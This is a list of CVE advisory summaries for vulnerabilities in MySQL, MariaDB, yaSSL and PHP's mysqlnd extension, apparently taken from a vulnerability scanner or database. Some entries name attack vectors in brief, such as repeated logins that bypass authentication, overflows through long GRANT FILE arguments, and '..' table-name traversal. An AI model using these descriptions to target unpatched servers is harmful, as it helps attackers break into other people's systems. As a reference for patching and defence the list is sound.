| [CVE-2013-1567] Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language, a different vulnerability than CVE-2013-2395.
| [CVE-2013-1566] Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
| [CVE-2013-1555] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, and 5.5.29 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Partition.
| [CVE-2013-1552] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier and 5.5.29 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
| [CVE-2013-1548] Unspecified vulnerability in Oracle MySQL 5.1.63 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Types.
| [CVE-2013-1544] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language.
| [CVE-2013-1532] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Information Schema.
| [CVE-2013-1531] Unspecified vulnerability in Oracle MySQL 5.1.66 and earlier and 5.5.28 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Server Privileges.
| [CVE-2013-1526] Unspecified vulnerability in Oracle MySQL 5.5.29 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Replication.
| [CVE-2013-1523] Unspecified vulnerability in Oracle MySQL 5.5.29 and earlier and 5.6.10 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Server Optimizer.
| [CVE-2013-1521] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier and 5.5.29 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Server Locking.
| [CVE-2013-1512] Unspecified vulnerability in Oracle MySQL 5.5.29 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language.
| [CVE-2013-1511] Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
| [CVE-2013-1506] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, 5.5.29 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Locking.
| [CVE-2013-1502] Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and 5.6.9 and earlier allows local users to affect availability via unknown vectors related to Server Partition.
| [CVE-2013-1492] Buffer overflow in yaSSL, as used in MySQL 5.1.x before 5.1.68 and 5.5.x before 5.5.30, has unspecified impact and attack vectors, a different vulnerability than CVE-2012-0553.
| [CVE-2013-0389] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
| [CVE-2013-0386] Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to Stored Procedure.
| [CVE-2013-0385] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows local users to affect confidentiality and integrity via unknown vectors related to Server Replication.
| [CVE-2013-0384] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Information Schema.
| [CVE-2013-0383] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows remote attackers to affect availability via unknown vectors related to Server Locking.
| [CVE-2013-0375] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.1.28 and earlier, allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Server Replication.
| [CVE-2013-0371] Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users to affect availability, related to MyISAM.
| [CVE-2013-0368] Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
| [CVE-2013-0367] Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Partition.
| [CVE-2012-5615] MySQL 5.5.19 and possibly other versions, and MariaDB 5.5.28a, 5.3.11, 5.2.13, 5.1.66, and possibly other versions, generates different error messages with different time delays depending on whether a user name exists, which allows remote attackers to enumerate valid usernames.
| [CVE-2012-5614] Oracle MySQL 5.1.67 and earlier and 5.5.29 and earlier, and MariaDB 5.5.28a and possibly other versions, allows remote authenticated users to cause a denial of service (mysqld crash) via a SELECT command with an UpdateXML command containing XML with a large number of unique, nested elements.
| [CVE-2012-5613] ** DISPUTED ** MySQL 5.5.19 and possibly other versions, and MariaDB 5.5.28a and possibly other versions, when configured to assign the FILE privilege to users who should not have administrative privileges, allows remote authenticated users to gain privileges by leveraging the FILE privilege to create files as the MySQL administrator. NOTE: the vendor disputes this issue, stating that this is only a vulnerability when the administrator does not follow recommendations in the product's installation documentation. NOTE: it could be argued that this should not be included in CVE because it is a configuration issue.
| [CVE-2012-5612] Heap-based buffer overflow in Oracle MySQL 5.5.19 and other versions through 5.5.28, and MariaDB 5.5.28a and possibly other versions, allows remote authenticated users to cause a denial of service (memory corruption and crash) and possibly execute arbitrary code, as demonstrated using certain variations of the (1) USE, (2) SHOW TABLES, (3) DESCRIBE, (4) SHOW FIELDS FROM, (5) SHOW COLUMNS FROM, (6) SHOW INDEX FROM, (7) CREATE TABLE, (8) DROP TABLE, (9) ALTER TABLE, (10) DELETE FROM, (11) UPDATE, and (12) SET PASSWORD commands.
| [CVE-2012-5611] Stack-based buffer overflow in the acl_get function in Oracle MySQL 5.5.19 and other versions through 5.5.28, and 5.1.53 and other versions through 5.1.66, and MariaDB 5.5.2.x before 5.5.28a, 5.3.x before 5.3.11, 5.2.x before 5.2.13 and 5.1.x before 5.1.66, allows remote authenticated users to execute arbitrary code via a long argument to the GRANT FILE command.
| [CVE-2012-5383] ** DISPUTED ** Untrusted search path vulnerability in the installation functionality in Oracle MySQL 5.5.28, when installed in the top-level C:\ directory, might allow local users to gain privileges via a Trojan horse DLL in the "C:\MySQL\MySQL Server 5.5\bin" directory, which may be added to the PATH system environment variable by an administrator, as demonstrated by a Trojan horse wlbsctrl.dll file used by the "IKE and AuthIP IPsec Keying Modules" system service in Windows Vista SP1, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 Release Preview. NOTE: CVE disputes this issue because the unsafe PATH is established only by a separate administrative action that is not a default part of the MySQL installation.
| [CVE-2012-5096] Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users with Server Privileges to affect availability via unknown vectors.
| [CVE-2012-5060] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.65 and earlier and 5.5.27 and earlier allows remote authenticated users to affect availability, related to GIS Extension.
| [CVE-2012-4452] MySQL 5.0.88, and possibly other versions and platforms, allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments that are originally associated with pathnames without symlinks, and that can point to tables created at a future time at which a pathname is modified to contain a symlink to a subdirectory of the MySQL data home directory, related to incorrect calculation of the mysql_unpacked_real_data_home value. NOTE: this vulnerability exists because of a CVE-2009-4030 regression, which was not omitted in other packages and versions such as MySQL 5.0.95 in Red Hat Enterprise Linux 6.
| [CVE-2012-4414] Multiple SQL injection vulnerabilities in the replication code in Oracle MySQL possibly before 5.5.29, and MariaDB 5.1.x through 5.1.62, 5.2.x through 5.2.12, 5.3.x through 5.3.7, and 5.5.x through 5.5.25, allow remote authenticated users to execute arbitrary SQL commands via vectors related to the binary log. NOTE: as of 20130116, Oracle has not commented on claims from a downstream vendor that the fix in MySQL 5.5.29 is incomplete.
| [CVE-2012-3197] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Replication.
| [CVE-2012-3180] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.65 and earlier, and 5.5.27 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
| [CVE-2012-3177] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.65 and earlier, and 5.5.27 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server.
| [CVE-2012-3173] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.63 and earlier, and 5.5.25 and earlier, allows remote authenticated users to affect availability via unknown vectors related to InnoDB Plugin.
| [CVE-2012-3167] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.63 and earlier, and 5.5.25 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Full Text Search.
| [CVE-2012-3166] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.63 and earlier, and 5.5.25 and earlier, allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
| [CVE-2012-3163] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Information Schema.
| [CVE-2012-3160] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.65 and earlier, and 5.5.27 and earlier, allows local users to affect confidentiality via unknown vectors related to Server Installation.
| [CVE-2012-3158] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Protocol.
| [CVE-2012-3156] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.25 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server.
| [CVE-2012-3150] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
| [CVE-2012-3149] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.26 and earlier allows remote authenticated users to affect confidentiality, related to MySQL Client.
| [CVE-2012-3147] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.26 and earlier allows remote attackers to affect integrity and availability, related to MySQL Client.
| [CVE-2012-3144] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server.
| [CVE-2012-2750] Unspecified vulnerability in MySQL 5.5.x before 5.5.23 has unknown impact and attack vectors related to a "Security Fix", aka Bug #59533. NOTE: this might be a duplicate of CVE-2012-1689, but as of 20120816, Oracle has not commented on this possibility.
| [CVE-2012-2749] MySQL 5.1.x before 5.1.63 and 5.5.x before 5.5.24 allows remote authenticated users to cause a denial of service (mysqld crash) via vectors related to incorrect calculation and a sort order index.
| [CVE-2012-2122] sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.
| [CVE-2012-2102] MySQL 5.1.x before 5.1.62 and 5.5.x before 5.5.22 allows remote authenticated users to cause a denial of service (assertion failure and mysqld abort) by deleting a record and using HANDLER READ NEXT.
| [CVE-2012-1757] Unspecified vulnerability in Oracle MySQL Server 5.5.23 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
| [CVE-2012-1756] Unspecified vulnerability in Oracle MySQL Server 5.5.23 and earlier allows remote authenticated users to affect availability via unknown vectors.
| [CVE-2012-1735] Unspecified vulnerability in Oracle MySQL Server 5.5.23 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
| [CVE-2012-1734] Unspecified vulnerability in Oracle MySQL Server 5.1.62 and earlier, and 5.5.23 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
| [CVE-2012-1705] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier and 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
| [CVE-2012-1703] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.61 and earlier, and 5.5.21 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
| [CVE-2012-1702] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier and 5.5.28 and earlier allows remote attackers to affect availability via unknown vectors.
| [CVE-2012-1697] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.21 and earlier allows remote authenticated users to affect availability via unknown vectors related to Partition.
| [CVE-2012-1696] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.19 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
| [CVE-2012-1690] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.61 and earlier, and 5.5.21 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
| [CVE-2012-1689] Unspecified vulnerability in Oracle MySQL Server 5.1.62 and earlier, and 5.5.22 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
| [CVE-2012-1688] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.61 and earlier, and 5.5.21 and earlier, allows remote authenticated users to affect availability, related to Server DML.
| [CVE-2012-0882] Buffer overflow in yaSSL, as used in MySQL 5.5.20 and possibly other versions including 5.5.x before 5.5.22 and 5.1.x before 5.1.62, allows remote attackers to execute arbitrary code via unspecified vectors, as demonstrated by VulnDisco Pack Professional 9.17. NOTE: as of 20120224, this disclosure has no actionable information. However, because the module author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. NOTE: due to lack of details, it is not clear whether this issue is a duplicate of CVE-2012-0492 or another CVE.
| [CVE-2012-0583] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.60 and earlier, and 5.5.19 and earlier, allows remote authenticated users to affect availability, related to MyISAM.
| [CVE-2012-0578] Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
| [CVE-2012-0574] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows remote authenticated users to affect availability via unknown vectors.
| [CVE-2012-0572] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier and 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
| [CVE-2012-0553] Buffer overflow in yaSSL, as used in MySQL 5.1.x before 5.1.68 and 5.5.x before 5.5.28, has unspecified impact and attack vectors, a different vulnerability than CVE-2013-1492.
| [CVE-2012-0540] Unspecified vulnerability in Oracle MySQL Server 5.1.62 and earlier and 5.5.23 and earlier allows remote authenticated users to affect availability, related to GIS Extension.
| [CVE-2012-0496] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
| [CVE-2012-0495] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0486, CVE-2012-0487, CVE-2012-0488, CVE-2012-0489, CVE-2012-0491, and CVE-2012-0493.
| [CVE-2012-0494] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows local users to affect availability via unknown vectors.
| [CVE-2012-0493] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0486, CVE-2012-0487, CVE-2012-0488, CVE-2012-0489, CVE-2012-0491, and CVE-2012-0495.
| [CVE-2012-0492] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0119, CVE-2012-0120, and CVE-2012-0485.
| [CVE-2012-0491] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0486, CVE-2012-0487, CVE-2012-0488, CVE-2012-0489, CVE-2012-0493, and CVE-2012-0495.
| [CVE-2012-0490] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows remote authenticated users to affect availability via unknown vectors.
| [CVE-2012-0489] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0486, CVE-2012-0487, CVE-2012-0488, CVE-2012-0491, CVE-2012-0493, and CVE-2012-0495.
| [CVE-2012-0488] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0486, CVE-2012-0487, CVE-2012-0489, CVE-2012-0491, CVE-2012-0493, and CVE-2012-0495.
| [CVE-2012-0487] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0486, CVE-2012-0488, CVE-2012-0489, CVE-2012-0491, CVE-2012-0493, and CVE-2012-0495.
10612| [CVE-2012-0486] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0487, CVE-2012-0488, CVE-2012-0489, CVE-2012-0491, CVE-2012-0493, and CVE-2012-0495.
10613| [CVE-2012-0485] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0119, CVE-2012-0120, and CVE-2012-0492.
10614| [CVE-2012-0484] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows remote authenticated users to affect confidentiality via unknown vectors.
10615| [CVE-2012-0120] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0119, CVE-2012-0485, and CVE-2012-0492.
10616| [CVE-2012-0119] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0120, CVE-2012-0485, and CVE-2012-0492.
10617| [CVE-2012-0118] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect confidentiality and availability via unknown vectors, a different vulnerability than CVE-2012-0113.
10618| [CVE-2012-0117] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0486, CVE-2012-0487, CVE-2012-0488, CVE-2012-0489, CVE-2012-0491, CVE-2012-0493, and CVE-2012-0495.
10619| [CVE-2012-0116] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
10620| [CVE-2012-0115] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0119, CVE-2012-0120, CVE-2012-0485, and CVE-2012-0492.
10621| [CVE-2012-0114] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows local users to affect confidentiality and integrity via unknown vectors.
10622| [CVE-2012-0113] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect confidentiality and availability via unknown vectors, a different vulnerability than CVE-2012-0118.
10623| [CVE-2012-0112] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0115, CVE-2012-0119, CVE-2012-0120, CVE-2012-0485, and CVE-2012-0492.
10624| [CVE-2012-0102] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x and 5.1.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0087 and CVE-2012-0101.
10625| [CVE-2012-0101] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x and 5.1.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0087 and CVE-2012-0102.
10626| [CVE-2012-0087] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x and 5.1.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0101 and CVE-2012-0102.
10627| [CVE-2012-0075] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows remote authenticated users to affect integrity via unknown vectors.
10628| [CVE-2011-5049] MySQL 5.5.8, when running on Windows, allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted packet to TCP port 3306.
10629| [CVE-2011-2262] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote attackers to affect availability via unknown vectors.
10630| [CVE-2011-1906] Trustwave WebDefend Enterprise before 5.0 7.01.903-1.4 stores specific user-account credentials in a MySQL database, which makes it easier for remote attackers to read the event collection table via requests to the management port, a different vulnerability than CVE-2011-0756.
10631| [CVE-2010-4700] The set_magic_quotes_runtime function in PHP 5.3.2 and 5.3.3, when the MySQLi extension is used, does not properly interact with use of the mysqli_fetch_assoc function, which might make it easier for context-dependent attackers to conduct SQL injection attacks via crafted input that had been properly handled in earlier PHP versions.
10632| [CVE-2010-3840] The Gis_line_string::init_from_wkb function in sql/spatial.cc in MySQL 5.1 before 5.1.51 allows remote authenticated users to cause a denial of service (server crash) by calling the PolyFromWKB function with Well-Known Binary (WKB) data containing a crafted number of (1) line strings or (2) line points.
10633| [CVE-2010-3839] MySQL 5.1 before 5.1.51 and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (infinite loop) via multiple invocations of a (1) prepared statement or (2) stored procedure that creates a query with nested JOIN statements.
10634| [CVE-2010-3838] MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (server crash) via a query that uses the (1) GREATEST or (2) LEAST function with a mixed list of numeric and LONGBLOB arguments, which is not properly handled when the function's result is "processed using an intermediate temporary table."
10635| [CVE-2010-3837] MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (server crash) via a prepared statement that uses GROUP_CONCAT with the WITH ROLLUP modifier, probably triggering a use-after-free error when a copied object is modified in a way that also affects the original object.
10636| [CVE-2010-3836] MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (assertion failure and server crash) via vectors related to view preparation, pre-evaluation of LIKE predicates, and IN Optimizers.
10637| [CVE-2010-3835] MySQL 5.1 before 5.1.51 and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (mysqld server crash) by performing a user-variable assignment in a logical expression that is calculated and stored in a temporary table for GROUP BY, then causing the expression value to be used after the table is created, which causes the expression to be re-evaluated instead of accessing its value from the table.
10638| [CVE-2010-3834] Unspecified vulnerability in MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (server crash) via vectors related to "materializing a derived table that required a temporary table for grouping" and "user variable assignments."
10639| [CVE-2010-3833] MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 does not properly propagate type errors, which allows remote attackers to cause a denial of service (server crash) via crafted arguments to extreme-value functions such as (1) LEAST and (2) GREATEST, related to KILL_BAD_DATA and a "CREATE TABLE ... SELECT."
10640| [CVE-2010-3683] Oracle MySQL 5.1 before 5.1.49 and 5.5 before 5.5.5 sends an OK packet when a LOAD DATA INFILE request generates SQL errors, which allows remote authenticated users to cause a denial of service (mysqld daemon crash) via a crafted request.
10641| [CVE-2010-3682] Oracle MySQL 5.1 before 5.1.49 and 5.0 before 5.0.92 allows remote authenticated users to cause a denial of service (mysqld daemon crash) by using EXPLAIN with crafted "SELECT ... UNION ... ORDER BY (SELECT ... WHERE ...)" statements, which triggers a NULL pointer dereference in the Item_singlerow_subselect::store function.
10642| [CVE-2010-3681] Oracle MySQL 5.1 before 5.1.49 and 5.5 before 5.5.5 allows remote authenticated users to cause a denial of service (mysqld daemon crash) by using the HANDLER interface and performing "alternate reads from two indexes on a table," which triggers an assertion failure.
10643| [CVE-2010-3680] Oracle MySQL 5.1 before 5.1.49 allows remote authenticated users to cause a denial of service (mysqld daemon crash) by creating temporary tables with nullable columns while using InnoDB, which triggers an assertion failure.
10644| [CVE-2010-3679] Oracle MySQL 5.1 before 5.1.49 allows remote authenticated users to cause a denial of service (mysqld daemon crash) via certain arguments to the BINLOG command, which triggers an access of uninitialized memory, as demonstrated by valgrind.
10645| [CVE-2010-3678] Oracle MySQL 5.1 before 5.1.49 allows remote authenticated users to cause a denial of service (crash) via (1) IN or (2) CASE operations with NULL arguments that are explicitly specified or indirectly provided by the WITH ROLLUP modifier.
10646| [CVE-2010-3677] Oracle MySQL 5.1 before 5.1.49 and 5.0 before 5.0.92 allows remote authenticated users to cause a denial of service (mysqld daemon crash) via a join query that uses a table with a unique SET column.
10647| [CVE-2010-3676] storage/innobase/dict/dict0crea.c in mysqld in Oracle MySQL 5.1 before 5.1.49 allows remote authenticated users to cause a denial of service (assertion failure) by modifying the (1) innodb_file_format or (2) innodb_file_per_table configuration parameters for the InnoDB storage engine, then executing a DDL statement.
10648| [CVE-2010-3064] Stack-based buffer overflow in the php_mysqlnd_auth_write function in the Mysqlnd extension in PHP 5.3 through 5.3.2 allows context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long (1) username or (2) database name argument to the (a) mysql_connect or (b) mysqli_connect function.
10649| [CVE-2010-3063] The php_mysqlnd_read_error_from_line function in the Mysqlnd extension in PHP 5.3 through 5.3.2 does not properly calculate a buffer length, which allows context-dependent attackers to trigger a heap-based buffer overflow via crafted inputs that cause a negative length value to be used.
10650| [CVE-2010-3062] mysqlnd_wireprotocol.c in the Mysqlnd extension in PHP 5.3 through 5.3.2 allows remote attackers to (1) read sensitive memory via a modified length value, which is not properly handled by the php_mysqlnd_ok_read function
10651| [CVE-2010-2008] MySQL before 5.1.48 allows remote authenticated users with alter database privileges to cause a denial of service (server crash and database loss) via an ALTER DATABASE command with a #mysql50# string followed by a . (dot), .. (dot dot), ../ (dot dot slash) or similar sequence, and an UPGRADE DATA DIRECTORY NAME command, which causes MySQL to move certain directories to the server data directory.
10652| [CVE-2010-1850] Buffer overflow in MySQL 5.0 through 5.0.91 and 5.1 before 5.1.47 allows remote authenticated users to execute arbitrary code via a COM_FIELD_LIST command with a long table name.
10653| [CVE-2010-1849] The my_net_skip_rest function in sql/net_serv.cc in MySQL 5.0 through 5.0.91 and 5.1 before 5.1.47 allows remote attackers to cause a denial of service (CPU and bandwidth consumption) by sending a large number of packets that exceed the maximum length.
10654| [CVE-2010-1848] Directory traversal vulnerability in MySQL 5.0 through 5.0.91 and 5.1 before 5.1.47 allows remote authenticated users to bypass intended table grants to read field definitions of arbitrary tables, and on 5.1 to read or delete content of arbitrary tables, via a .. (dot dot) in a table name.
10655| [CVE-2010-1626] MySQL before 5.1.46 allows local users to delete the data and index files of another user's MyISAM table via a symlink attack in conjunction with the DROP TABLE command, a different vulnerability than CVE-2008-4098 and CVE-2008-7247.
10656| [CVE-2010-1621] The mysql_uninstall_plugin function in sql/sql_plugin.cc in MySQL 5.1 before 5.1.46 does not check privileges before uninstalling a plugin, which allows remote attackers to uninstall arbitrary plugins via the UNINSTALL PLUGIN command.
10657| [CVE-2009-5026] The executable comment feature in MySQL 5.0.x before 5.0.93 and 5.1.x before 5.1.50, when running in certain slave configurations in which the slave is running a newer version than the master, allows remote attackers to execute arbitrary SQL commands via custom comments.
10658| [CVE-2009-4484] Multiple stack-based buffer overflows in the CertDecoder::GetName function in src/asn.cpp in TaoCrypt in yaSSL before 1.9.9, as used in mysqld in MySQL 5.0.x before 5.0.90, MySQL 5.1.x before 5.1.43, MySQL 5.5.x through 5.5.0-m2, and other products, allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption and daemon crash) by establishing an SSL connection and sending an X.509 client certificate with a crafted name field, as demonstrated by mysql_overflow1.py and the vd_mysql5 module in VulnDisco Pack Professional 8.11. NOTE: this was originally reported for MySQL 5.0.51a.
10659| [CVE-2009-4030] MySQL 5.1.x before 5.1.41 allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments that are originally associated with pathnames without symlinks, and that can point to tables created at a future time at which a pathname is modified to contain a symlink to a subdirectory of the MySQL data home directory, related to incorrect calculation of the mysql_unpacked_real_data_home value. NOTE: this vulnerability exists because of an incomplete fix for CVE-2008-4098 and CVE-2008-2079.
10660| [CVE-2009-4028] The vio_verify_callback function in viosslfactories.c in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41, when OpenSSL is used, accepts a value of zero for the depth of X.509 certificates, which allows man-in-the-middle attackers to spoof arbitrary SSL-based MySQL servers via a crafted certificate, as demonstrated by a certificate presented by a server linked against the yaSSL library.
